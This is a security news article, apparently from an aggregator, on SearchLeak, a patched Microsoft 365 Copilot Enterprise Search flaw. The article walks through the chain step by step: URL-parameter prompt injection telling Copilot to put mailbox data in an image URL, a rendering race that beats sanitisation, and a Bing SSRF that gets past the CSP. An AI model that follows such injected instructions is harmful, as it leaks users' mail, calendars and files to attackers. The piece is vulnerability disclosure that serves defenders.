# Researchers Reveal One-Click Microsoft 365 Copilot Data-Exfiltration Flaw > Source: > Published: 2026-06-15 17:09:48.930980+00:00 # Researchers Reveal One-Click Microsoft 365 Copilot Data-Exfiltration Flaw Varonis Threat Labs disclosed SearchLeak (CVE-2026-42824, critical), a one-click data-exfiltration chain in Microsoft 365 Copilot Enterprise Search. The attack chains three flaws: a parameter-to-prompt (P2P) injection via the URL 'q' parameter that feeds Copilot attacker instructions; an HTML rendering race condition that fires an attacker-controlled image tag before output sanitization completes; and a Bing server-side request forgery (SSRF) that routes stolen data through Bing's image retrieval endpoint, bypassing the page's Content Security Policy entirely because the request originates from Microsoft infrastructure (Varonis; BleepingComputer). The victim sees only Copilot thinking - no visible data movement occurs. Exfiltration targets include mailbox content, calendar events, OneDrive and SharePoint files. Because the crafted link uses a real microsoft.com domain, standard URL filtering and anti-phishing tools are unlikely to flag it (The Hacker News). Microsoft patched the flaw server-side at the beginning of June 2026, requiring no customer action; Varonis disclosed a proof-of-concept only, with no observed in-the-wild exploitation (BleepingComputer; MSRC). ### What happened Varonis Threat Labs disclosed SearchLeak on June 15, 2026 - a one-click data-exfiltration chain targeting Microsoft 365 Copilot Enterprise Search. Microsoft assigned the vulnerability CVE-2026-42824 with a critical severity rating; CVSS scores were 6.5 per Microsoft's advisory and 7.5 per the National Vulnerability Database (The Hacker News; MSRC). The company patched the flaw on its backend at the beginning of June 2026, requiring no action from customers, and Varonis disclosed only a proof-of-concept with no evidence of in-the-wild exploitation (BleepingComputer; Varonis SearchLeak). ### Three-stage attack chain SearchLeak combines three individually insufficient weaknesses to achieve one-click exfiltration (Varonis SearchLeak; BleepingComputer). Stage 1 - Parameter-to-Prompt (P2P) injection: Microsoft 365 Copilot Enterprise Search accepts a 'q' URL parameter for natural-language search queries. Unlike standard Copilot, Copilot Enterprise Search retrieves company data from email, calendar, SharePoint, and OneDrive. An attacker crafts a URL with instructions in 'q' telling Copilot to search the victim's mailbox and embed results in an image URL. The victim types nothing; one click hands off the work to Copilot (Varonis SearchLeak). Stage 2 - HTML rendering race: Microsoft's safeguard wraps Copilot output in code blocks so browsers treat markup as plain text. The catch is timing: the wrapping happens after generation completes, but browsers render the streamed output as it arrives. The injected image tag fires and makes its outbound request before sanitization runs (BleepingComputer). Stage 3 - Bing SSRF as exfiltration proxy: The page's Content Security Policy blocks image requests to arbitrary domains but allowlists *.bing.com. Bing's 'Search by Image' endpoint accepts a URL and fetches it server-side. The attacker points that fetch at their own server with stolen data encoded in the path. Because Bing - not the victim's browser - makes the request, the CSP is bypassed. From the attacker's server logs, the data is readable (Varonis SearchLeak; BleepingComputer). ### Scope and data at risk Affected product is Microsoft 365 Copilot Enterprise Search. Potentially exfiltrated content includes email text including access codes and passwords, calendar events and meeting details, and files accessible through OneDrive and SharePoint (BleepingComputer). The crafted link uses a real microsoft.com domain, so anti-phishing and URL reputation tools are unlikely to flag it as suspicious (The Hacker News). ### Remediation and status Microsoft mitigated SearchLeak server-side at the beginning of June 2026. No client-side patch or user action is required. Varonis published a proof-of-concept and reported no evidence of exploitation in the wild at time of disclosure (BleepingComputer; MSRC). ### Industry context Editorial analysis: Varonis has identified a recurring class of Copilot vulnerabilities including Reprompt (January 2026, Copilot Personal) and EchoLeak (2025, M365 Copilot). SearchLeak adds a new variant specific to the Enterprise Search surface. The pattern illustrates how AI-assisted search features - which combine LLM instruction-following, streaming render pipelines, and server-side fetch integrations - create compound attack surfaces where individually known bug classes (SSRF, HTML injection timing) become high-impact when chained with prompt injection. "Bing becomes an unwitting exfiltration proxy. A classic SSRF, hiding in plain sight behind a CSP allowlist entry," Varonis researchers wrote (Varonis SearchLeak). ## Scoring Rationale SearchLeak is a critical-rated, well-documented vulnerability chain in widely deployed enterprise AI (M365 Copilot Enterprise Search), with full technical disclosure from Varonis and coverage across multiple security outlets. Impact is tempered by server-side patching before public disclosure and absence of observed exploitation, and actual CVSS scores (6.5/7.5) are lower than initially reported; this places it at the upper end of Notable. Practice interview problems based on real data 1,500+ SQL & Python problems across 15 industry datasets — the exact type of data you work with. [Try 250 free problems](/problems)